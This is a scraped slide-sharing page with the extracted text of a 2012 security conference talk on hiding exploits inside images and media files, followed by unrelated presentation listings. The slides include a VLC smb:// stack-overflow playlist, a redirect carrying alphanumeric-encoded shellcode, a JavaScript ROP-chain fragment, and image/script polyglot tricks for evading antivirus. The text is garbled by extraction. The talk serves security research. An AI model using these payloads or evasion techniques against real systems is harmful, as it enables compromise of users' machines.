g ood ood
play

G ood ood p ackage ackage Saumil Shah net-square D E E P D E E P - PowerPoint PPT Presentation

Jun 23, 2023 •99 likes •428 views

w hen hen B ad ad Tings Tings come come in in G ood ood p ackage ackage Saumil Shah net-square D E E P D E E P S E C 2 0 1 2 2 # who am i Saumil Shah, CEO Net-Square. Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. M.S.

  1. w hen hen B ad ad Tings Tings come come in in G ood ood p ackage ackage Saumil Shah net-square D E E P D E E P S E C 2 0 1 2 2

  2. # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University. • saumil@net-square.com • LinkedIn: saumilshah • Twitter: @therealsaumil net-square

  3. My area of work Penetration Reverse Exploit Testing Engineering Writing New O ff ensive Attack Research Security Defense Conference Conference "Eyes and Speaker Trainer ears open" net-square

  4. When two forces combine... Web Binary Hacking Exploits net-square

  5. SNEAKY LETHAL net-square

  6. net-square

  7. 302 IMG JS HTML5 net-square

  8. net-square

  9. VLC smb over fl ow • smb://example.com@0.0.0.0/foo/ #{AAAAAAAA....} • Classic Stack Over fl ow. net-square

  10. VLC XSPF fi le <?xml version="1.0" encoding="UTF-8"?> � <playlist version="1" � xmlns="http://xspf.org/ns/0/" � xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> � <title>Playlist</title> � <trackList> � <track> � <location> � smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} � </location> � <extension � application="http://www.videolan.org/vlc/playlist/0"> � <vlc:id>0</vlc:id> � </extension> � </track> � </trackList> � </playlist> � net-square

  11. Tiny Alpha Encoded ZOMFG! URL Exploit net-square

  12. 100% Pure Alphanum! net-square

  13. VLC smb over fl ow - HTMLized!! � <embed type="application/x-vlc-plugin" � � � width="320" height="200" � � � target="http://tinyurl.com/ycctrzf" � � � id="vlc" /> � net-square

  14. 301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently � X-Powered-By: PHP/5.2.12 � Location: smb://example.com@0.0.0.0/foo/ #{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA � AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1 � JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA � AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA � AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA � AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA � AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA � AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII � IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL � KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk � PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH � kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn � CUCHPeEPAA} � Content-type: text/html � Content-Length: 0 � Connection: close � Server: TinyURL/1.6 � net-square

  15. net-square

  16. Exploits as Images - 1 • Grayscale encoding (0-255). • 1 pixel = 1 character. • Perfectly valid image. • Decode and Execute! net-square

  17. net-square

  18. I'm an evil Javascript I'm an innocent image net-square

  19. function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s; return(unescape("%u"+s.substring(4,8)+"%u"+s.sub string(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof ["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_e ax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6 d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720 ;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addres sof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["in c_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret" ]=0x00000000;addressof["call_peax_ret"]=0x6d8aec 31;addressof["add_esp_24_ret"]=0x00000000;addres sof["popad_ret"]=0x6d82a8a1;addressof["call_peax "]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnu m){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_r et"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_r et"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_r et"]);var call_peax_ret=packv(addressof["call_peax_ret"]); var add_esp_24_ret=packv(addressof["add_esp_24_ret"] );var popad_ret=packv(addressof["popad_ret"]);var retval="" � <CANVAS> net-square

  20. See no eval() net-square

  21. Same Same No Di ff erent! var a = eval(str); a = (new Function(str))(); net-square

  22. IMAJS I iz being a Javascript net-square

  23. IMAJS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script> net-square

  24. IMAJS-GIF Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square

  25. IMAJS-BMP Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square

  26. The α q Exploit net-square

  27. Demo α q IMAJS FTW! net-square

  28. Alpha encoded exploit code IMAJS CANVAS "loader" script net-square

  29. These are not the sploits you're looking for net-square

  30. No virus threat detected net-square

  31. The FUTURE? net-square

  32. w hen hen B ad ad Tings Tings come come in in G ood ood p ackage ackage THE END @therealsaumil saumil@net-square.com net-square

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Samba Lets Dance! Computer Center, CS, NCTU Network-based File Sharing (1) NFS

Samba Lets Dance! Computer Center, CS, NCTU Network-based File Sharing (1) NFS

Samba Lets Dance! Computer Center, CS, NCTU Network-based File Sharing (1) NFS (UNIX-based) mountd is responsible for mount request nfsd and nfsiod Based on RPC CIFS (Microsoft) Common Internet File System

440 views • 26 slides
Super Mario Bros. Is Harder/Easier than We Thought FUN 2016 Erik D. Demaine, Giovanni Viglietta,

Super Mario Bros. Is Harder/Easier than We Thought FUN 2016 Erik D. Demaine, Giovanni Viglietta,

Super Mario Bros. Is Harder/Easier than We Thought FUN 2016 Erik D. Demaine, Giovanni Viglietta, Aaron Williams La Maddalena June 9, 2016 Super Mario Bros. Is Harder/Easier than We Thought State of the art: FUN 2014 &quot;Classic Nintendo

1.17k views • 77 slides
Samba4 A New Beginning Andrew Tridgell Samba Team Major Features The basic goals of

Samba4 A New Beginning Andrew Tridgell Samba Team Major Features The basic goals of

Samba4 A New Beginning Andrew Tridgell Samba Team Major Features The basic goals of Samba4 are quite ambitious, but achievable: protocol completeness extreme testability non-POSIX backends fully asynchronous internals

765 views • 19 slides
QUEENSWAY SECONDARY SCHOOL 2020 Secondary 1 Registration Day 8.30am, 23 Dec (M onday) 1 S

QUEENSWAY SECONDARY SCHOOL 2020 Secondary 1 Registration Day 8.30am, 23 Dec (M onday) 1 S

QUEENSWAY SECONDARY SCHOOL 2020 Secondary 1 Registration Day 8.30am, 23 Dec (M onday) 1 S ECONDARY 1 R EGISTRATION D AY I NTRODUCTION &amp; WELCOM E M r Yeo Choon Hwa (Assistant Y ear Head - Sec 1) 2 P ROGRAM M E FOR S ECONDARY 1 R

1.64k views • 88 slides
NLO QCD and SMC Algorithms Richard Corke Outline Parton shower matching POWHEG to Pythia

NLO QCD and SMC Algorithms Richard Corke Outline Parton shower matching POWHEG to Pythia

NLO QCD and SMC Algorithms Richard Corke Outline Parton shower matching POWHEG to Pythia interface Hardest emission: Pythia vs NLO QCD Conclusion Parton shower matching SMC best in soft/collinear regions Match NLO matrix

287 views • 11 slides
Project: Embedded SMC What is Secure Computa1on [SMC] A B

Project: Embedded SMC What is Secure Computa1on [SMC] A B

Project: Embedded SMC What is Secure Computa1on [SMC] A B Compute f(A, B) Without revealing A to Bob and B to Alice

510 views • 24 slides
Secure Multi-party Computation What it is, and why youd care Manoj Prabhakaran University of

Secure Multi-party Computation What it is, and why youd care Manoj Prabhakaran University of

Secure Multi-party Computation What it is, and why youd care Manoj Prabhakaran University of Illinois, Urbana-Champaign SMC SMC SMC conceived more than 30 years back SMC SMC conceived more than 30 years back A very general concept that

395 views • 28 slides
Stateless Model Checking for TSO and PSO Parosh Aziz Abdulla Stavros Aronis Mohamed Faouzi Atig

Stateless Model Checking for TSO and PSO Parosh Aziz Abdulla Stavros Aronis Mohamed Faouzi Atig

Introduction TSO Traces and Happens-Before Experiments Future Work Stateless Model Checking for TSO and PSO Parosh Aziz Abdulla Stavros Aronis Mohamed Faouzi Atig Bengt Jonsson Carl Leonardsson Konstantinos Sagonas Uppsala University,

544 views • 50 slides
tt+X hadroproduction at NLO+SMC Zoltn Trcsnyi University of Debrecen and Institute

tt+X hadroproduction at NLO+SMC Zoltn Trcsnyi University of Debrecen and Institute

tt+X hadroproduction at NLO+SMC Zoltn Trcsnyi University of Debrecen and Institute of Nuclear Research in collaboration with A. Kardos, M.V. Garzelli and HELAC group based on arXiv:1101.2672, 1108.0387 and unpublished Thursday,

955 views • 60 slides
Variable Binding, Symmetric Monoidal Pardon Closed Theories, and Bigraphs Motivation Signatures

Variable Binding, Symmetric Monoidal Pardon Closed Theories, and Bigraphs Motivation Signatures

Variable Binding, Symmetric Monoidal Closed Theories, and Bigraphs Garner, Hirschowitz, Variable Binding, Symmetric Monoidal Pardon Closed Theories, and Bigraphs Motivation Signatures and free smc categories Application to Richard Garner

473 views • 35 slides
Motivation f g h P STE ckt A C (theorem proving) OKAY? SMC ckt (G(r F a)) Use

Motivation f g h P STE ckt A C (theorem proving) OKAY? SMC ckt (G(r F a)) Use

A Stream-based Framework for Reasoning with STE and other LTL Verification Formalisms John OLeary Tom Melham Dept of Computing Science Strategic CAD Labs Intel Corporation University of Glasgow Glasgow, Scotland, G12 8QQ 5200 NE Elam

276 views • 13 slides
COMP 633 - Parallel Computing Lecture 7 September 3, 2020 SMM (2) OpenMP Programming Model

COMP 633 - Parallel Computing Lecture 7 September 3, 2020 SMM (2) OpenMP Programming Model

COMP 633 - Parallel Computing Lecture 7 September 3, 2020 SMM (2) OpenMP Programming Model Reading for next time OpenMP tutorial: look through secns 3-5 plus secn 6 up to exercise 1 COMP 633 - Prins Shared Memory Multiprocessing

428 views • 27 slides
Securing Secure Boot on Xen Ross Lagerwall Software Engineer, Citrix Systems 1 / 15

Securing Secure Boot on Xen Ross Lagerwall Software Engineer, Citrix Systems 1 / 15

Securing Secure Boot on Xen Ross Lagerwall Software Engineer, Citrix Systems 1 / 15 Presentation licensed CC-By-SA-4.0 Why Secure Boot? How can we prevent running malware at boot? With Secure Boot! What if the machine is a VM in

303 views • 15 slides
A differential approach to computing zeta functions over finite fields Kiran S. Kedlaya

A differential approach to computing zeta functions over finite fields Kiran S. Kedlaya

A differential approach to computing zeta functions over finite fields Kiran S. Kedlaya Department of Mathematics, Massachusetts Institute of Technology AMS-SMM Joint Meeting Zacatecas, May 25, 2007 Kiran S. Kedlaya (MIT, Dept. of Mathematics)

775 views • 49 slides
Small-Scale Shared Address Space Multiprocessor (MIMD) Processors are connected via a dynamic

Small-Scale Shared Address Space Multiprocessor (MIMD) Processors are connected via a dynamic

Small-Scale Shared Address Space Multiprocessor (MIMD) Processors are connected via a dynamic network/bus to a shared memory Communication and coordination through shared variables in the memory Lecture 3: The user (the

358 views • 9 slides
Introduction &amp; Overview Lecture 01, 2018-03-19 Christian Schulte cschulte@kth.se Software

Introduction &amp; Overview Lecture 01, 2018-03-19 Christian Schulte cschulte@kth.se Software

ID2204: Constraint Programming Introduction &amp; Overview Lecture 01, 2018-03-19 Christian Schulte cschulte@kth.se Software and Computer Systems School of Electrical Engineering and Computer Science KTH Royal Institute of Technology Sweden

565 views • 39 slides
Operationalizing Social Media - How SAP Replicated its Successful Social Media Processes Across

Operationalizing Social Media - How SAP Replicated its Successful Social Media Processes Across

Operationalizing Social Media - How SAP Replicated its Successful Social Media Processes Across the Globe Todd Wilms Sr. Director, Social Media Audience Marketing, SAP What are the most frustrating challenges to social media marketing

141 views • 12 slides
AMP SoCal Joint Supplier Networks/Operational Improvement Pillar Committee A&amp;D Supplier

AMP SoCal Joint Supplier Networks/Operational Improvement Pillar Committee A&amp;D Supplier

The Aerospace &amp; Defense Forum South Bay Chapter May 13, 2015 AMP SoCal Joint Supplier Networks/Operational Improvement Pillar Committee A&amp;D Supplier Forum May 13, 2015 The AMP SoCal Story Goal - Strengthen Southern California

206 views • 6 slides
Low Dimensional Magnetism Workshop European School on Magnetism Timisoara, Sept. 08, 2009 Pietro

Low Dimensional Magnetism Workshop European School on Magnetism Timisoara, Sept. 08, 2009 Pietro

Low Dimensional Magnetism Workshop European School on Magnetism Timisoara, Sept. 08, 2009 Pietro Gambardella ICREA and Centre dInvestigaci en Nanocincia i Nanotecnologia (ICN-CSIC), Barcelona, Spain Olivier Fruchart Institut Nel

838 views • 54 slides
Arkadiusz Bukowiec Faculty of Electrical Engineering, Computer Science and Telecommunications

Arkadiusz Bukowiec Faculty of Electrical Engineering, Computer Science and Telecommunications

13th - 14th December 2012 Liverpool, United Kingdom Arkadiusz Bukowiec Faculty of Electrical Engineering, Computer Science and Telecommunications Institute of Computer Engineering and Electronics University of Zielona Gra P OLAND

424 views • 27 slides
Non- C 2 -cofinite VOAs and the Verlinde formula David Ridout (with Thomas Creutzig and Simon

Non- C 2 -cofinite VOAs and the Verlinde formula David Ridout (with Thomas Creutzig and Simon

CFT and Verlinde Dropping C 2 -cofiniteness Standard modules A C 2 -cofinite Verlinde formula? Non- C 2 -cofinite VOAs and the Verlinde formula David Ridout (with Thomas Creutzig and Simon Wood) Department of Theoretical Physics &amp;

918 views • 53 slides
An Easy CiviCRM Solution. Pipe Dream or reality? CiviCRM is great, but difficult to

An Easy CiviCRM Solution. Pipe Dream or reality? CiviCRM is great, but difficult to

An Easy CiviCRM Solution. Pipe Dream or reality? CiviCRM is great, but difficult to configure We want to grow CiviCRMs user base to SMN Often cant afford development costs Cant afford ongoing maintenance &amp;

485 views • 6 slides
CAESAR candidate ICEPOLE Pawel Morawiecki 1 , 2 , Kris Gaj 3 , Ekawat Homsirikamol 3 , Krystian

CAESAR candidate ICEPOLE Pawel Morawiecki 1 , 2 , Kris Gaj 3 , Ekawat Homsirikamol 3 , Krystian

Introduction and Motivation Icepole Design Security Analysis HW and SW Performance Summary . CAESAR candidate ICEPOLE Pawel Morawiecki 1 , 2 , Kris Gaj 3 , Ekawat Homsirikamol 3 , Krystian Matusiewicz 4 , Josef Pieprzyk 5 , 6 , Marcin Rogawski

528 views • 29 slides
ICMEs as drivers of Sun-Earth coupling and Space Weather initiatives of LAMP in Argentina Dasso

ICMEs as drivers of Sun-Earth coupling and Space Weather initiatives of LAMP in Argentina Dasso

ICMEs as drivers of Sun-Earth coupling and Space Weather initiatives of LAMP in Argentina Dasso S., Lanabere V., Santos N., Gulisano A., Areso O. &amp; Pereira M. DCAO &amp; DF (FCEN-UBA) IAFE (UBA-CONICET) IAA (DNA), Argentina In

370 views • 25 slides

More recommend